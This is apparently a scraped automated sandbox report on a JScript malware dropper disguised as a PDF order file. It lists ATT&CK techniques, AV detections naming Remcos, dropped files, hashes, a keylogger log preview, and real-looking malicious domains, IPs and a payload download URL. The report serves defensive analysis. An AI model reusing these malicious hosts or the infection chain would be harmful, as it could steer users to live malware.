            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            PowerShell
            Logon Script (Mac)Logon Script (Mac)3
            Software Packing
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits113
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            File Deletion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Masquerading
            DCSync1
            Remote System Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)412
            Process Injection
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 737570 Sample: Order Specifications PDF.js Startdate: 03/11/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 15 other signatures 2->51 8 wscript.exe 16 2->8         started        13 Systedbddfm.exe 1 2->13         started        process3 dnsIp4 41 tgc8x.tk 50.115.174.192, 443, 49710 VIRPUS United States 8->41 37 C:\Users\user\AppData\...\VNZVNCXKKJSF.exe, PE32 8->37 dropped 39 C:\Users\user\AppData\...\VNZVNCXKKJSF[1].exe, PE32 8->39 dropped 59 System process connects to network (likely due to code injection or exploit) 8->59 61 Benign windows process drops PE files 8->61 63 JScript performs obfuscated calls to suspicious functions 8->63 65 Deletes itself after installation 8->65 15 VNZVNCXKKJSF.exe 1 8->15         started        67 Writes to foreign memory regions 13->67 69 Allocates memory in foreign processes 13->69 71 Injects a PE file into a foreign processes 13->71 18 powershell.exe 3 13->18         started        20 RegSvcs.exe 13->20         started        file5 signatures6 process7 signatures8 73 Antivirus detection for dropped file 15->73 75 Multi AV Scanner detection for dropped file 15->75 77 Machine Learning detection for dropped file 15->77 22 powershell.exe 11 15->22         started        26 RegSvcs.exe 2 3 15->26         started        29 conhost.exe 18->29         started        process9 dnsIp10 33 C:\Users\user\AppData\...\Systedbddfm.exe, PE32 22->33 dropped 53 Drops PE files to the startup folder 22->53 55 Powershell drops PE file 22->55 31 conhost.exe 22->31         started        43 51.75.209.245, 2404 OVHFR France 26->43 35 C:\ProgramData\remcos\logs.dat, data 26->35 dropped 57 Installs a global keyboard hook 26->57 file11 signatures12 process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Order Specifications PDF.js27%ReversingLabsScript-JS.Trojan.Remcos
            Order Specifications PDF.js25%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe65%ReversingLabsByteCode-MSIL.Trojan.Woreflint
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe65%ReversingLabsByteCode-MSIL.Trojan.Woreflint
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe65%ReversingLabsByteCode-MSIL.Trojan.Woreflint
            SourceDetectionScannerLabelLinkDownload
            13.0.RegSvcs.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
            10.0.VNZVNCXKKJSF.exe.540000.0.unpack100%AviraTR/Dropper.GenDownload File
            SourceDetectionScannerLabelLink
            tgc8x.tk6%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo100%Avira URL Cloudphishing
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exe100%Avira URL Cloudmalware
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g100%Avira URL Cloudphishing
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exe13%VirustotalBrowse
            https://go.micros0%Avira URL Cloudsafe
            51.75.209.2450%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            tgc8x.tk
            50.115.174.192
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exetrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            51.75.209.245true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSystedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drfalse
            • URL Reputation: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://tgc8x.tk/tt/VNZVNCXKKJSF.exepowscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              https://sectigo.com/CPS0Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drfalse
              • URL Reputation: safe
              unknown
              https://go.microspowershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.sectigo.com0Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drfalse
              • URL Reputation: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://geoplugin.net/json.gp/CVNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://contoso.com/powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_gwscript.exe, 00000000.00000003.330576085.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271757510.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263690422.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268366678.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256906649.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.255312802.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254064481.0000018AB4B6C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250150561.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.331377637.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.309049295.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264679771.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332128622.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250282440.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.308651780.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.332656131.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.250225824.0000018AB4B7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.336031702.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.310975197.0000018AB4B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.254098907.0000018AB4B7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.256263555.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.264316692.0000018AB4B74000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      50.115.174.192
                      tgc8x.tkUnited States
                      32875VIRPUStrue
                      51.75.209.245
                      unknownFrance
                      16276OVHFRtrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:737570
                      Start date and time:2022-11-03 23:34:01 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:Order Specifications PDF.js
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (Javascript)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 158
                      • Number of non-executed functions: 23
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Execution Graph export aborted for target RegSvcs.exe, PID 480 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 5224 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      23:36:00API Interceptor1x Sleep call for process: VNZVNCXKKJSF.exe modified
                      23:37:21API Interceptor42x Sleep call for process: powershell.exe modified
                      23:37:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
                      23:37:59API Interceptor1x Sleep call for process: Systedbddfm.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      50.115.174.192RFQ.exeGet hashmaliciousBrowse
                        RFQ- PO90064765002293.exeGet hashmaliciousBrowse
                          output(3).jsGet hashmaliciousBrowse
                            PO_1276445.jsGet hashmaliciousBrowse
                              Purchase inquiry .jsGet hashmaliciousBrowse
                                StZAEFSb2j.exeGet hashmaliciousBrowse
                                  U8RYIwIvfK.exeGet hashmaliciousBrowse
                                    DHL SHIPMENT INVOICE.jsGet hashmaliciousBrowse
                                      CnptEaXHK7.exeGet hashmaliciousBrowse
                                        PO.exeGet hashmaliciousBrowse
                                          RFQ# 6000163267.jsGet hashmaliciousBrowse
                                            WY220353098B.jsGet hashmaliciousBrowse
                                              PO-4290971524_11-2-2022.jsGet hashmaliciousBrowse
                                                vNrvIu0ujD.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              51.75.209.245DHL SHIPMENT INVOICE.jsGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    file.exeGet hashmaliciousBrowse
                                                                      file.exeGet hashmaliciousBrowse
                                                                        DHL SHIPPING DOCUMENTS.jsGet hashmaliciousBrowse
                                                                          RFQ 01.300.TRGVH.exeGet hashmaliciousBrowse
                                                                            TNT Shipping Documents.jsGet hashmaliciousBrowse
                                                                              file.exeGet hashmaliciousBrowse
                                                                                NEW ORDER 27.10.2022.exeGet hashmaliciousBrowse
                                                                                  TNT Shipping Documents.exeGet hashmaliciousBrowse
                                                                                    PAYMENT COPY.jsGet hashmaliciousBrowse
                                                                                      RFQ No. 01.300.TRGVH.exeGet hashmaliciousBrowse
                                                                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                          Request For Quotation 01.300.TRGVH.exeGet hashmaliciousBrowse
                                                                                            Request For Quotation 01.300.TRGVH.exeGet hashmaliciousBrowse
                                                                                              Request For Quotation 01.300.TRGVH.exeGet hashmaliciousBrowse
                                                                                                TNT Original Invoice.exeGet hashmaliciousBrowse
                                                                                                  NEW PURCHASE ORDER 7A68D20.exeGet hashmaliciousBrowse
                                                                                                    PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      tgc8x.tkRFQ.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      RFQ- PO90064765002293.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      output(3).jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO_1276445.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      Purchase inquiry .jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      StZAEFSb2j.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      U8RYIwIvfK.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      DHL SHIPMENT INVOICE.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      CnptEaXHK7.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      RFQ# 6000163267.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      WY220353098B.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO-4290971524_11-2-2022.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      vNrvIu0ujD.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      VIRPUSRFQ.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      RFQ- PO90064765002293.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      output(3).jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO_1276445.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      Purchase inquiry .jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      StZAEFSb2j.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      U8RYIwIvfK.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      DHL SHIPMENT INVOICE.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      CnptEaXHK7.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      RFQ# 6000163267.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      WY220353098B.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      PO-4290971524_11-2-2022.jsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      vNrvIu0ujD.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxkb3Aub25lP2U9c3R1YXJ0LnRhaXRAY21zLWNtY2suY29tGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      https://soundcheck.com.mx/?ads_click=1&data=14017-14016-14009-13726-1&nonce=fd9790b2d6&redir=https://sedyol.com.tr/q3dendum/recterfyer/#smills@diversityworksnz.org.nzGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      ns), UAE.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      http://beeflambnz.comGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      45060285252_Purchase Agr.General Conducts_V2. 2021_ita.vbsGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      https://www.evernote.com/shard/s442/sh/3cbc5eb4-4f27-1eca-7d98-4ba7525ba59d/e8a3f04f19a5f7d8ba0b4218a0a04649Get hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      https://rameshsunkoju.com/floe/database.php?loadlog=okGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      http://622302.622302.envipetro.co.za/#.aHR0cDovL0Rlby5oeWRyb3ZpY3RvcmlhZmlzaGhhdGNoZXJ5ZmFybS5jby5rZS9odG1sI1RrRkVTVTVGTGtOU1FWZEdUMUpFUUdSbGJ5NXRlV1pzYjNKcFpHRXVZMjl0Get hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9jYXItYWdlLnRvcD9lPVozTmxkR2hwUUdaamNITXVaV1IxGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      ATT.htmlGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      SecuriteInfo.com.Gen.Variant.Nemesis.13378.6656.371.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      Invoice-38937.shtmlGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      SecuriteInfo.com.Gen.Variant.Nemesis.13378.20126.6200.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      No context
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):216
                                                                                                      Entropy (8bit):3.3448102746557975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rnlSlLl8alFNqlDl5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:0lRjF4b5YcIeeDAlOWAAe5q1gWAv
                                                                                                      MD5:4E985ACC86743F3E1726CB9DAEE285AD
                                                                                                      SHA1:F6BCE911E5AFC3194AEAF4180BF934D45C6B21C5
                                                                                                      SHA-256:2AE29D539D27B0B585AEE9E303F72348C942D84856D38428C4DDFE0D1ABC3CC1
                                                                                                      SHA-512:70A17A221875B019321FA9C534B34D18A987A42C112AD2B86CFF7D6DE7CDBFDC90C172CE7CD7EA5603E045D28E308775A5BD39AD93D68EC117E691C089AF7BCB
                                                                                                      Malicious:true
                                                                                                      Preview:....[.2.0.2.2./.1.1./.0.3. .2.3.:.3.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):5.347480285514745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                      MD5:7758BEB381EB8F360E01D8E3C7D2F776
                                                                                                      SHA1:5604F98BBFC87B90608925EC9F71764FA66F7BD7
                                                                                                      SHA-256:8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
                                                                                                      SHA-512:B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):5.347480285514745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                      MD5:7758BEB381EB8F360E01D8E3C7D2F776
                                                                                                      SHA1:5604F98BBFC87B90608925EC9F71764FA66F7BD7
                                                                                                      SHA-256:8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
                                                                                                      SHA-512:B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                      Process:C:\Windows\System32\wscript.exe
